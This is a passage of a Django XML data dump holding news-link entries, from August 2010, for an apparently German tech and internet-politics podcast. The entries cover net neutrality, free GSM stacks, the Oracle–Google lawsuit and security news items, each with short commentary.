&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/10/german_government_mulls_blackberry_iphone_ban/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/germanybansblackberrysandiphonesonsnoopingf.png</field><field type="SlugField" name="slug">germanybansblackberrysandiphonesonsnoopingf</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 20:49:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">bsi iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="394" model="submitter.newsentry"><field type="CharField" name="title"> eco-Positionspapier zur Netzneutralität : netzpolitik.org</field><field type="TextField" name="excerpt">Passt zum Sendungsthema.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Passt zum Sendungsthema.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/eco-positionspapier-zur-netzneutralitat/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/eco-positionspapierzurnetzneutralitatnetzpo.png</field><field type="SlugField" name="slug">eco-positionspapierzurnetzneutralitatnetzpo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 20:08:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">eco netneutrality</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="393" model="submitter.newsentry"><field type="CharField" name="title">Worlds first 20 minute voice call from a Free Software GSM stack on a phone </field><field type="TextField" name="excerpt">As Dieter Spaar has pointed out in a mailing list post on the OsmocomBB developer list, he has managed to get a first alpha version of TCH (Traffic Channel) code released, supporting the FR and EFR GSM codecs.
What this means in human readable language: He can actually make voice calls from a mobile phone that runs the Free Software OsmocomBB GSM stack on its baseband processor. This is a major milestone in the history of our project.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;As Dieter Spaar has pointed out in a mailing list post on the OsmocomBB developer list, he has managed to get a first alpha version of TCH (Traffic Channel) code released, supporting the FR and EFR GSM codecs.
&lt;/p&gt;
&lt;p&gt;What this means in human readable language: He can actually make voice calls from a mobile phone that runs the Free Software OsmocomBB GSM stack on its baseband processor. This is a major milestone in the history of our project.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://laforge.gnumonks.org/weblog/2010/08/14/#20100814-dieter_tch_voice_call</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/haraldweltesblog_.png</field><field type="SlugField" name="slug">haraldweltesblog</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 14:27:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">free gsm voice</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="392" model="submitter.newsentry"><field type="CharField" name="title">Polizeigewerkschaft will Google-Streetview für virtuelle Streifenfahrten nutzen</field><field type="TextField" name="excerpt">keine Worte</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;keine Worte
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bitterlemmer.net/wp/2010/08/15/polizeigewerkschaft-will-google-streetview-fur-virtuelle-streifenfahrten-nutzen/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/polizeigewerkschaftwillgoogle-streetviewfurvir.png</field><field type="SlugField" name="slug">polizeigewerkschaftwillgoogle-streetviewfurvir</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 14:17:01</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">polizeigewerkschaft streetview</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="391" model="submitter.newsentry"><field type="CharField" name="title">Researchers use smudge attack, identify Android passcodes 68 percent of the time | ZDNet </field><field type="TextField" name="excerpt">Diese Fingerwisch-Sperre am Android wurde in 68% aller Fälle gehackt, nachdem sie Bilder vom Display in div. Spektren gemacht haben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Diese Fingerwisch-Sperre am Android wurde in 68% aller Fälle gehackt, nachdem sie Bilder vom Display in div. Spektren gemacht haben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zdnet.com/blog/security/researchers-use-smudge-attack-identify-android-passcodes-68-percent-of-the-time/7165</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/researchersusesmudgeattackidentifyandroidpa.png</field><field type="SlugField" name="slug">researchersusesmudgeattackidentifyandroidpa</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 14:04:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">android</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="390" model="submitter.newsentry"><field type="CharField" name="title">Hacker pretends to be Axl Rose and Cancels Guns N Roses Tour Via Twitter on Spoonfed - Things to do in London</field><field type="TextField" name="excerpt">Axel Rose's Twitter account gehackt und Tour abgesagt. (Das ist der Typ mit Kocking on heavens door...)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Axel Rose's Twitter account gehackt und Tour abgesagt. (Das ist der Typ mit Kocking on heavens door...)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spoonfed.co.uk/spooners/spoonfed-live-music-team-8190/hacker-pretends-to-be-axl-rose-and-cancels-guns-n-roses-tour-via-twitter-3546/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/hackerpretendstobeaxlroseandcancelsgunsn.png</field><field type="SlugField" name="slug">hackerpretendstobeaxlroseandcancelsgunsn</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 14:02:21</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">guns'n'roses twitter</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="389" model="submitter.newsentry"><field type="CharField" name="title"> Datenschutz-Problem gelöst: Einfach mal den Namen ändern : netzpolitik.org</field><field type="TextField" name="excerpt">Schmidt: Leute sollten mit 18 ihren Namen wechseln, damit ihre Jugendsünden nicht mehr in Netz auffindbar sind.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Schmidt: Leute sollten mit 18 ihren Namen wechseln, damit ihre Jugendsünden nicht mehr in Netz auffindbar sind.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/datenschutz-problem-geloest-einfach-mal-den-namen-aendern/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/datenschutz-problemgelosteinfachmaldenname.png</field><field type="SlugField" name="slug">datenschutz-problemgelosteinfachmaldenname</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-17 13:56:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google schmidt</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="388" model="submitter.newsentry"><field type="CharField" name="title">RIAA will zwangsweise UKW-Empfänger in Handies</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/08/radio-riaa-mandatory-fm-radio-in-cell-phones-is-the-future.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss</field><field type="FileField" name="page_screenshot">page_shots/2010/08/16/riaawillzwangsweiseukw-empfangerinhandies.png</field><field type="SlugField" name="slug">riaawillzwangsweiseukw-empfangerinhandies</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-16 20:30:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="387" model="submitter.newsentry"><field type="CharField" name="title">Skype: Programmierer knackt Skype-Protokoll</field><field type="TextField" name="excerpt">Das Protokoll wurde reverse engineered, info leaked. Vortrag auf dem 27c3. Wo auch sonst?
In .de lauschen die Behörden mittlerweile mit [Udo Vetter/Lawblog](http://www.gulli.com/news/skype-in-deutschland-bereits-nicht-mehr-abh-rsicher-2010-08-17)
Etwas älter (2007), aber dennoch freaky Geschichte dazu [Skype als Wanze](http://www.oreillynet.com/etel/blog/2007/04/skype_revenue_from_national_se_1.html). Damit läßt sich remote das Mic einschalten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das Protokoll wurde reverse engineered, info leaked. Vortrag auf dem 27c3. Wo auch sonst?
In .de lauschen die Behörden mittlerweile mit &lt;a href="http://www.gulli.com/news/skype-in-deutschland-bereits-nicht-mehr-abh-rsicher-2010-08-17"&gt;Udo Vetter/Lawblog&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Etwas älter (2007), aber dennoch freaky Geschichte dazu &lt;a href="http://www.oreillynet.com/etel/blog/2007/04/skype_revenue_from_national_se_1.html"&gt;Skype als Wanze&lt;/a&gt;. Damit läßt sich remote das Mic einschalten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1007/76365.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/20/skypeprogrammiererknacktskype-protokoll-gole.png</field><field type="SlugField" name="slug">skypeprogrammiererknacktskype-protokoll-gole</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-15 22:40:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">skype</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="386" model="submitter.newsentry"><field type="CharField" name="title">Oracle sues Google</field><field type="TextField" name="excerpt">Tja, warum haben sie auch Java für ihr Phone genommen?
Die Java die! .de Java User Groups wollen ganz weg von Kommerzkontrolle [heise](http://www.heise.de/newsticker/meldung/Deutsche-Java-Anwender-aergern-sich-ueber-Oracle-1061565.html)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Tja, warum haben sie auch Java für ihr Phone genommen?
&lt;/p&gt;
&lt;p&gt;Die Java die! .de Java User Groups wollen ganz weg von Kommerzkontrolle &lt;a href="http://www.heise.de/newsticker/meldung/Deutsche-Java-Anwender-aergern-sich-ueber-Oracle-1061565.html"&gt;heise&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://tirania.org/blog/archive/2010/Aug-13.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/19/oraclesuesgoogle_.png</field><field type="SlugField" name="slug">oraclesuesgoogle</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-13 23:24:50</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google java oracle patent</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object><object pk="3"></object></field></object><object pk="385" model="submitter.newsentry"><field type="CharField" name="title">RIP Open Solaris</field><field type="TextField" name="excerpt">Das war es für Open Solaris. Mal gucken wann OpenOffice, VirtualBox und das andere OpenZeugs aus dem Sun-Nachlass verschrottet wird.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Das war es für Open Solaris. Mal gucken wann OpenOffice, VirtualBox und das andere OpenZeugs aus dem Sun-Nachlass verschrottet wird.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blogs.everycity.co.uk/alasdair/2010/08/opensolaris-is-now-officially-dead-rip/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/13/ripopensolaris.png</field><field type="SlugField" name="slug">ripopensolaris</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-13 23:11:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">oracle solaris</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="384" model="submitter.newsentry"><field type="CharField" name="title">A Review of Verizon and Google&amp;#039;s Net Neutrality Proposal | Electronic Frontier Foundation</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">https://www.eff.org/deeplinks/2010/08/google-verizon-netneutrality</field><field type="FileField" name="page_screenshot">page_shots/2010/08/13/areviewofverizonandgoogle039snetneutrali.png</field><field type="SlugField" name="slug">areviewofverizonandgoogle039snetneutrali</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-13 15:13:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="383" model="submitter.newsentry"><field type="CharField" name="title">heise online - Britische Regierung: Internet Explorer 6 ist sicher genug</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Britische-Regierung-Internet-Explorer-6-ist-sicher-genug-1051804.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/13/heiseonline-britischeregierunginternetexplo.png</field><field type="SlugField" name="slug">heiseonline-britischeregierunginternetexplo</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-13 15:12:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="382" model="submitter.newsentry"><field type="CharField" name="title">Schon wieder: Remote Code Execution Vulnerabilities in Adobe Flash</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Adobe-schliesst-kritische-Luecken-in-Flash-und-Co-1053688.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/13/schonwiederremotecodeexecutionvulnerabilitie.png</field><field type="SlugField" name="slug">schonwiederremotecodeexecutionvulnerabilitie</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">14</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-13 15:11:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="381" model="submitter.newsentry"><field type="CharField" name="title"> Piraten-Vorstand verschiebt Liquid-Democracy-Start : netzpolitik.org</field><field type="TextField" name="excerpt">Piratenpartei schießt sich ein Eigentor mit Liquid Feedback Einführungsaufschub.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Piratenpartei schießt sich ein Eigentor mit Liquid Feedback Einführungsaufschub.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/piraten-vorstand-gegen-liquid-democracy/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/piraten-vorstandverschiebtliquid-democracy-sta.png</field><field type="SlugField" name="slug">piraten-vorstandverschiebtliquid-democracy-sta</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 22:23:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">piratenpartei</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="380" model="submitter.newsentry"><field type="CharField" name="title">Firefox 4 beta crack ruse spreads Trojan to total idiots • The Register</field><field type="TextField" name="excerpt">You notice that the Browser War is won if the scammers are offering Firefox 4 beta w/ keyloggers.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;You notice that the Browser War is won if the scammers are offering Firefox 4 beta w/ keyloggers.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/06/firefox_crack_scam/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/firefox4betacrackrusespreadstrojantototal.png</field><field type="SlugField" name="slug">firefox4betacrackrusespreadstrojantototal</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 22:18:42</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">browser firefox scam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="379" model="submitter.newsentry"><field type="CharField" name="title">Court Rejects Warrantless GPS Tracking | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">Washington, D.C. - The U.S. Court of Appeals for the District of Columbia Circuit today firmly rejected government claims that federal agents have an unfettered right to install Global Positioning System (GPS) location-tracking devices on anyone's car without a search warrant.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Washington, D.C. - The U.S. Court of Appeals for the District of Columbia Circuit today firmly rejected government claims that federal agents have an unfettered right to install Global Positioning System (GPS) location-tracking devices on anyone's car without a search warrant.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/press/archives/2010/08/06-0</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/courtrejectswarrantlessgpstrackingelectroni.png</field><field type="SlugField" name="slug">courtrejectswarrantlessgpstrackingelectroni</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 22:14:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">eff gps tracking</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="378" model="submitter.newsentry"><field type="CharField" name="title">eBay photocopier data risk ignored • The Register</field><field type="TextField" name="excerpt">Photo copy machine bought at eBay. Found sensitive documents from defence supplier Cobham.
With the assistance of experts, the paper was able to recover documents and faxes including an April purchase order from aerospace giant BAE Systems and NATO briefing notes. It also found a direct debit instruction that gave away the details of one of the firm's bank accounts, along with an authorised signature and the personal details of one worker from a vetting request.
Vielleicht hat der WL-Informant nur einen alten Kopierer gekauft?</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Photo copy machine bought at eBay. Found sensitive documents from defence supplier Cobham.
&lt;/p&gt;
&lt;p&gt;With the assistance of experts, the paper was able to recover documents and faxes including an April purchase order from aerospace giant BAE Systems and NATO briefing notes. It also found a direct debit instruction that gave away the details of one of the firm's bank accounts, along with an authorised signature and the personal details of one worker from a vetting request.
&lt;/p&gt;
&lt;p&gt;Vielleicht hat der WL-Informant nur einen alten Kopierer gekauft?
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/06/ebay_photocopier_disposal_risk/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/ebayphotocopierdatariskignoredtheregister.png</field><field type="SlugField" name="slug">ebayphotocopierdatariskignoredtheregister</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 22:12:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">dataloss</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="10"></object></field></object><object pk="377" model="submitter.newsentry"><field type="CharField" name="title">Private browsing modes in four biggest browsers often fail • The Register</field><field type="TextField" name="excerpt">Incognito browsing to *not* leave local traces seems not to be that incognito. Examples provided in the article.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Incognito browsing to &lt;em&gt;not&lt;/em&gt; leave local traces seems not to be that incognito. Examples provided in the article.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/06/private_browsing_mode_failure/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/privatebrowsingmodesinfourbiggestbrowsersof.png</field><field type="SlugField" name="slug">privatebrowsingmodesinfourbiggestbrowsersof</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 22:09:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">browser privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="376" model="submitter.newsentry"><field type="CharField" name="title">Sächsische Zeitung [online] - Politik: Nazi-Angriff auf Buchenwald kam aus Pirna</field><field type="TextField" name="excerpt">Am 28.Juli wurden die Internetseiten der Stiftung Gedenkstätten Buchenwald und Mittelbau Dora gehackt. „Inhalte wurden gelöscht und neue Texte eingespielt“, berichtet Hannes Grünseisen, Staatsanwalt in Erfurt.
Nun steht fest: Der Angriff kam aus Pirna. „Wir haben Telefondaten ausgewertet, welche die Telekom aus Abrechnungszwecken gespeichert hat“, erzählt Hannes Grünseisen. Die Täter hatten zuvor versucht, falsche Fährten zu legen. So wurden offenbar andere Internetadressen dazu genutzt, um die eigenen Spuren zu verwischen. Es schien zunächst, als käme der Anschlag aus Amerika.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Am 28.Juli wurden die Internetseiten der Stiftung Gedenkstätten Buchenwald und Mittelbau Dora gehackt. „Inhalte wurden gelöscht und neue Texte eingespielt“, berichtet Hannes Grünseisen, Staatsanwalt in Erfurt.
&lt;/p&gt;
&lt;p&gt;Nun steht fest: Der Angriff kam aus Pirna. „Wir haben Telefondaten ausgewertet, welche die Telekom aus Abrechnungszwecken gespeichert hat“, erzählt Hannes Grünseisen. Die Täter hatten zuvor versucht, falsche Fährten zu legen. So wurden offenbar andere Internetadressen dazu genutzt, um die eigenen Spuren zu verwischen. Es schien zunächst, als käme der Anschlag aus Amerika.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.sz-online.de/nachrichten/artikel.asp?id=2529098</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/sachsischezeitungonline-politiknazi-angrif.png</field><field type="SlugField" name="slug">sachsischezeitungonline-politiknazi-angrif</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 22:06:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">defacement nazis</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="375" model="submitter.newsentry"><field type="CharField" name="title">Apparatus for Facilitating the Birth of a Child by Centrifugal Force</field><field type="TextField" name="excerpt">The patent holders, George B. and Charlotte Blonsky, contend that the centrifuge could be a boon to "more civilized women," who, they surmise, often lack the muscle strength needed to easily push out a baby. Centrifugal force would act as a sort of invisible midwife, lessening the muscular force required for birthing. Would it work, though? Could one create enough outward force on the baby to make a difference -- without simultaneously making the mother lightheaded? I sent the patent to April Ronca, who used to research the effects of zero G on fetal growth and birth for NASA. "That is an interesting invention," she replied.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The patent holders, George B. and Charlotte Blonsky, contend that the centrifuge could be a boon to "more civilized women," who, they surmise, often lack the muscle strength needed to easily push out a baby. Centrifugal force would act as a sort of invisible midwife, lessening the muscular force required for birthing. Would it work, though? Could one create enough outward force on the baby to make a difference -- without simultaneously making the mother lightheaded? I sent the patent to April Ronca, who used to research the effects of zero G on fetal growth and birth for NASA. "That is an interesting invention," she replied.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://patimg1.uspto.gov/.piw?Docid=03216423&amp;homeurl=http%3A%2F%2Fpatft.uspto.gov%2Fnetacgi%2Fnph-Parser%3FSect1%3DPTO1%2526Sect2%3DHITOFF%2526d%3DPALL%2526p%3D1%2526u%3D%25252Fnetahtml%25252FPTO%25252Fsrchnum.htm%2526r%3D1%2526f%</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/apparatusforfacilitatingthebirthofachildby.png</field><field type="SlugField" name="slug">apparatusforfacilitatingthebirthofachildby</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 21:39:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object><object pk="5"></object></field></object><object pk="374" model="submitter.newsentry"><field type="CharField" name="title">Kindle Stories from Real Users &amp;laquo; Me and My Kindle</field><field type="TextField" name="excerpt">Coole Kindle-Werbung: Das Ding umgeht in China die Great Firewall.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Coole Kindle-Werbung: Das Ding umgeht in China die Great Firewall.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://meandmykindle.wordpress.com/2010/07/27/kindle-stories-from-real-users/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/06/kindlestoriesfromrealuserslaquomeandmyk.png</field><field type="SlugField" name="slug">kindlestoriesfromrealuserslaquomeandmyk</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-06 09:50:52</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">amazon china kindle</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="373" model="submitter.newsentry"><field type="CharField" name="title">BusyBox takes out bankrupt opponent in GPL lawsuit</field><field type="TextField" name="excerpt"> The ruling isn't a sweeping victory for the GPL, but it does show that the GPL is compatible with the standards for summary judgement.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt; The ruling isn't a sweeping victory for the GPL, but it does show that the GPL is compatible with the standards for summary judgement.
